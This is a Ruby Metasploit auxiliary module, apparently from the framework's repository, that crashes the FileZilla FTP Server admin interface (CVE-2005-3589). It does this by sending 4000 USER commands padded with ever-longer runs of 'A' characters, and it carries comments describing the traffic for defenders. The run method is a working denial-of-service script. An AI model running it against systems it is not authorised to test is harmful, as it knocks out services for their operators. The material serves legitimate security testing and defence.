rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Auxiliary denial-of-service module for CVE-2005-3589 (FileZilla FTP Server
# Administration Interface, versions 0.9.4d and earlier per the description).
#
# Defender notes, derived from what #run sends:
# - Each iteration opens a separate TCP connection to the FTP service, sends
#   exactly one USER command and closes the connection again.
# - The USER argument is a run of 'A' characters that grows by one per
#   connection, from 0 up to 3999 bytes. A burst of short-lived FTP sessions
#   with steadily growing USER arguments is therefore the observable pattern.
# - According to the description, only the administration GUI
#   (FileZilla Server Interface.exe) is affected, and only while it is
#   running; the FTP service itself keeps working.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Dos

  # Registers the module metadata (name, description, references, notes).
  #
  # @param info [Hash] metadata supplied by the caller, merged via update_info
  def initialize(info = {})
    module_info = {
      'Name' => 'FileZilla FTP Server Admin Interface Denial of Service',
      'Description' => %q{
        This module triggers a Denial of Service condition in the FileZilla FTP
        Server Administration Interface in versions 0.9.4d and earlier.
        By sending a procession of excessively long USER commands to the FTP
        Server, the Administration Interface (FileZilla Server Interface.exe)
        when running, will overwrite the stack with our string and generate an
        exception. The FileZilla FTP Server itself will continue functioning.
      },
      'Author' => [ 'aushack' ],
      'License' => MSF_LICENSE,
      'References' => [
        [ 'BID', '15346' ],
        [ 'CVE', '2005-3589' ],
        [ 'EDB', '1336' ],
        [ 'OSVDB', '20817' ]
      ],
      'DisclosureDate' => '2005-11-07',
      # NOTE(review): SideEffects is declared empty. The USER commands
      # presumably end up in the FTP server's own logs - confirm whether
      # IOC_IN_LOGS should be listed here.
      'Notes' => {
        'Stability' => [CRASH_SERVICE_DOWN],
        'SideEffects' => [],
        'Reliability' => []
      }
    }

    super(update_info(info, module_info))
  end

  # Sends 4000 USER commands, one per TCP connection, with an argument that
  # is one byte longer on every connection (0..3999 'A' characters).
  #
  # No error handling is present: an exception from connect or sock.put
  # propagates to the caller and skips the matching disconnect.
  def run
    print_status('Sending 4000 packets, this may take a while.')

    4000.times do |length|
      filler = 'A' * length

      connect
      sock.put("USER #{filler}\r\n")
      disconnect
    end
  end
end